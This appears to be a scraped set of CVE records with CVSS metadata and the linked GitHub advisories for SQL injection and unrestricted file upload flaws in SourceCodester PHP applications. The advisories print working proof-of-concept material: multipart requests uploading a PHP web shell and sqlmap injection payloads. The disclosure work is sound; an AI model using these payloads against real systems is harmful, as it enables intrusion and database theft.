"cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/38" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.265289" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.265289" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.339721" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/38" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.265289" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.265289" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.339721" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:warrendaloyan:vehicle_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "02A258DE-6115-4843-AC16-CA63EBAB3142", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/CveSecLook/cve/issues/38
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CveSecLook", "cve" ]
# SourceCodester Vehicle Management System in PHP/MySQL 1.0 newdriver.php Unrestricted Upload # NAME OF AFFECTED PRODUCT(S) + Vehicle Management System in PHP/MySQL ## Vendor Homepage + https://www.sourcecodester.com/php/14404/vehicle-management-system-phpmysql.html # AFFECTED AND/OR FIXED VERSION(S) ## submitter + BI1IHA ## Vulnerable File + newdriver.php ## VERSION(S) + V1.0 ## Software Link + https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/bus_vehicle_management.zip # PROBLEM TYPE ## Vulnerability Type + File upload ## Root Cause + In line 25 of the newdriver.php file, the input obtained through $-FILES is directly used to determine the storage location of the file without verification or cleaning. The specific code snippet is as follows: + ![1](https://github.com/CveSecLook/cve/assets/148504790/0121e45d-1771-4c07-9b13-62207f236c9a) ## Impact + Attackers can exploit this vulnerability for unrestricted uploads, which may lead to file overwrite, file injection, directory traversal attacks, and denial of service attacks. Remote attacks may also result in RCE # DESCRIPTION + BI1IHA discovered that the file upload operation was triggered on line 25 of the 'newdriver.php' file and the uploaded file was received using the '$_FILES' variable. Due to the lack of appropriate input validation and cleaning, remote attackers can pass malicious payloads through this file upload feature, resulting in unrestricted file uploads, which may further lead to remote code execution (RCE). # Vulnerability details and POC ## Payload ``` POST /newdriver.php HTTP/1.1 Host: 20.20.20.128:8118 Content-Length: 2889 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://20.20.20.128:8118 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycI2toMKBLABUeC5g User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://20.20.20.128:8118/newdriver.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ------WebKitFormBoundarycI2toMKBLABUeC5g Content-Disposition: form-data; name="drname" 1 ------WebKitFormBoundarycI2toMKBLABUeC5g Content-Disposition: form-data; name="drmobile" 1 ------WebKitFormBoundarycI2toMKBLABUeC5g Content-Disposition: form-data; name="drjoin" 1 ------WebKitFormBoundarycI2toMKBLABUeC5g Content-Disposition: form-data; name="drnid" 1 ------WebKitFormBoundarycI2toMKBLABUeC5g Content-Disposition: form-data; name="drlicense" 1 ------WebKitFormBoundarycI2toMKBLABUeC5g Content-Disposition: form-data; name="drlicensevalid" 1 ------WebKitFormBoundarycI2toMKBLABUeC5g Content-Disposition: form-data; name="draddress" 1 ------WebKitFormBoundarycI2toMKBLABUeC5g Content-Disposition: form-data; name="file"; filename="rce.php" Content-Type: image/jpeg <?php system("ipconfig"); ?> ------WebKitFormBoundarycI2toMKBLABUeC5g Content-Disposition: form-data; name="submit" 提交 ------WebKitFormBoundarycI2toMKBLABUeC5g-- ``` + ![1](https://github.com/CveSecLook/cve/assets/148504790/90936c9d-4ee5-4b9a-ae91-89b19fd5bb89) ## I successfully executed the PHP script on the terminal + ![3](https://github.com/CveSecLook/cve/assets/148504790/2d6faf65-6a48-4571-9244-ca6277f07daa)
SourceCodester Vehicle Management System in PHP/MySQL 1.0 newdriver.php Unrestricted Upload
https://api.github.com/repos/CveSecLook/cve/issues/38/comments
0
2024-05-20T11:32:27Z
2024-05-20T11:32:28Z
https://github.com/CveSecLook/cve/issues/38
2,305,786,142
38
6,030
CVE-2024-5362
2024-05-26T12:15:08.023
A vulnerability classified as critical has been found in SourceCodester Online Hospital Management System 1.0. Affected is an unknown function of the file departmentDoctor.php. The manipulation of the argument deptid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-266274 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/41" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266274" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266274" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.343373" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/41" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266274" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266274" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.343373" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:warrendaloyan:online_hospital_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "D7AE707F-ECBF-4435-B06E-4E87FA07FC29", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/CveSecLook/cve/issues/41
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CveSecLook", "cve" ]
# SourceCodester Online Hospital Management System Using PHP/MySQL departmentDoctor.php V1.0 SQL injection vulnerability # NAME OF AFFECTED PRODUCT(S) + Online Hospital Management System Using PHP/MySQL ## Vendor Homepage + https://www.sourcecodester.com/php/14386/online-hospital-management-system-using-phpmysql.html # AFFECTED AND/OR FIXED VERSION(S) ## submitter + ZhaoBin Huang ## Vulnerable File + departmentDoctor.php ## VERSION(S) + V1.0 ## Software Link + https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/online_hospital_management_system.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + The fourth line of the departmentDoctor.php file uses the PHP method to retrieve user input from the $_GET element. Then, the value of this element will be passed to the code without proper purification or validation, and ultimately used for database queries in the PHP method on line 5 of the departmentDoctor.php file. This may lead to SQL injection attacks + ![1](https://github.com/CveSecLook/cve/assets/92671097/5a019fe7-3a0b-4d88-9b02-0db7a65f8814) ## Impact + Attackers can exploit this vulnerability to gain database privileges, which can result in a large amount of data in the database. If the other party's database has DBA privileges, it may lead to server host privileges being obtained. # DESCRIPTION + ZhaoBin Huang has discovered that due to insufficient protection of the "deptid" parameter in the "\departmentDoctor.php" file, "Best courier management system project in php" there is a serious security vulnerability in the This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database.database. ## Payload + deptid=12' AND (SELECT 2306 FROM(SELECT COUNT(*),CONCAT(0x716b707671,(SELECT (ELT(2306=2306,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vptK'='vptK + ![4](https://github.com/CveSecLook/cve/assets/92671097/10d65754-3665-45c1-a339-64f4a4cc9cf3) ``` --- Parameter: deptid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: deptid=12' AND 9424=9424 AND 'hYov'='hYov Vector: AND [INFERENCE] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: deptid=12' AND (SELECT 2306 FROM(SELECT COUNT(*),CONCAT(0x716b707671,(SELECT (ELT(2306=2306,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vptK'='vptK Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: deptid=12' AND (SELECT 3022 FROM (SELECT(SLEEP(5)))IfUz) AND 'rvxr'='rvxr Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: deptid=12' UNION ALL SELECT CONCAT(0x716b707671,0x6b5a4352647756625962434873434d55424c6d437a47745664726d4b736c52667772717653687444,0x71786a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - Vector: UNION ALL SELECT [QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- ``` + This is showing the payload implemented by running sqlmap + ![3](https://github.com/CveSecLook/cve/assets/92671097/5f88b89b-37f1-4016-a34d-17bddf4fe6af) + The following is the database name displayed as a successful implementation of the attack by running sqlmap + ![3](https://github.com/CveSecLook/cve/assets/92671097/760ba508-1185-45b7-ba5a-5ff1ade74dfa)
SourceCodester Online Hospital Management System Using PHP/MySQL departmentDoctor.php V1.0 SQL injection vulnerability
https://api.github.com/repos/CveSecLook/cve/issues/41/comments
0
2024-05-23T12:08:12Z
2024-05-23T12:08:12Z
https://github.com/CveSecLook/cve/issues/41
2,312,753,429
41
6,031
CVE-2024-5377
2024-05-26T21:15:08.673
A vulnerability was found in SourceCodester Vehicle Management System 1.0. It has been classified as critical. This affects an unknown part of the file /newvehicle.php. The manipulation of the argument file leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266289 was assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yuyuliq/cve/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266289" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266289" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.343809" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yuyuliq/cve/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266289" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266289" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.343809" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:warrendaloyan:vehicle_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "02A258DE-6115-4843-AC16-CA63EBAB3142", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/yuyuliq/cve/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "yuyuliq", "cve" ]
# SourceCodester Vehicle Management System in PHP/MySQL 1.0 newvehicle.php Unrestricted Upload # NAME OF AFFECTED PRODUCT(S) + Vehicle Management System in PHP/MySQL ## Vendor Homepage + https://www.sourcecodester.com/php/14404/vehicle-management-system-phpmysql.html # AFFECTED AND/OR FIXED VERSION(S) ## submitter + Zhou Jiaming ## Vulnerable File + newvehicle.php ## VERSION(S) + V1.0 ## Software Link + https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/bus_vehicle_management.zip # PROBLEM TYPE ## Vulnerability Type + File upload ## Root Cause + In line 23 of the newdriver.php file, the input obtained through $-FILES is directly used to determine the storage location of the file without verification or cleaning. The specific code snippet is as follows: + ![1](https://github.com/yuyuliq/cve/assets/32999363/a91c950c-508c-4721-ab26-4276debbfeab) ## Impact + Attackers can exploit this vulnerability for unrestricted uploads, which may lead to file overwrite, file injection, directory traversal attacks, and denial of service attacks. Remote attacks may also result in RCE # DESCRIPTION + Zhou Jiaming discovered that the file upload operation was triggered on line 23 of the 'newvehicle.php' file and the uploaded file was received using the '$-FILES' variable. Due to the lack of appropriate input validation and cleaning, remote attackers can pass malicious payloads through this file upload feature, resulting in unrestricted file uploads, which may further lead to remote code execution (RCE). # Vulnerability details and POC ## Payload ``` POST /newvehicle.php HTTP/1.1 Host: 20.20.20.128:8118 Content-Length: 990 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://20.20.20.128:8118 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBTmrbmZQr7Fj0jSA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://20.20.20.128:8118/newvehicle.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ------WebKitFormBoundaryBTmrbmZQr7Fj0jSA Content-Disposition: form-data; name="vehregno" 1 ------WebKitFormBoundaryBTmrbmZQr7Fj0jSA Content-Disposition: form-data; name="type" car ------WebKitFormBoundaryBTmrbmZQr7Fj0jSA Content-Disposition: form-data; name="vehchesis" 1 ------WebKitFormBoundaryBTmrbmZQr7Fj0jSA Content-Disposition: form-data; name="vehbrand" 1 ------WebKitFormBoundaryBTmrbmZQr7Fj0jSA Content-Disposition: form-data; name="vehcolor" 1 ------WebKitFormBoundaryBTmrbmZQr7Fj0jSA Content-Disposition: form-data; name="vehregdate" 1 ------WebKitFormBoundaryBTmrbmZQr7Fj0jSA Content-Disposition: form-data; name="vehdescription" 1 ------WebKitFormBoundaryBTmrbmZQr7Fj0jSA Content-Disposition: form-data; name="file"; filename="rce.php" Content-Type: image/jpeg <?php system("ipconfig"); ?> ------WebKitFormBoundaryBTmrbmZQr7Fj0jSA Content-Disposition: form-data; name="submit" 鎻愪氦 ------WebKitFormBoundaryBTmrbmZQr7Fj0jSA-- ``` + ![2](https://github.com/yuyuliq/cve/assets/32999363/6b491581-10da-4c34-ad82-18f97729dffe) ## I successfully executed the PHP script on the terminal + ![3](https://github.com/yuyuliq/cve/assets/32999363/6ed14572-18e5-4920-993a-589ba5381827)
SourceCodester Vehicle Management System in PHP/MySQL 1.0 newvehicle.php Unrestricted Upload
https://api.github.com/repos/yuyuliq/cve/issues/1/comments
0
2024-05-24T06:57:55Z
2024-05-24T06:57:55Z
https://github.com/yuyuliq/cve/issues/1
2,314,575,961
1
6,032
CVE-2024-5381
2024-05-26T23:15:22.150
A vulnerability classified as critical was found in itsourcecode Student Information Management System 1.0. Affected by this vulnerability is an unknown functionality of the file view.php. The manipulation of the argument studentId leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266293 was assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
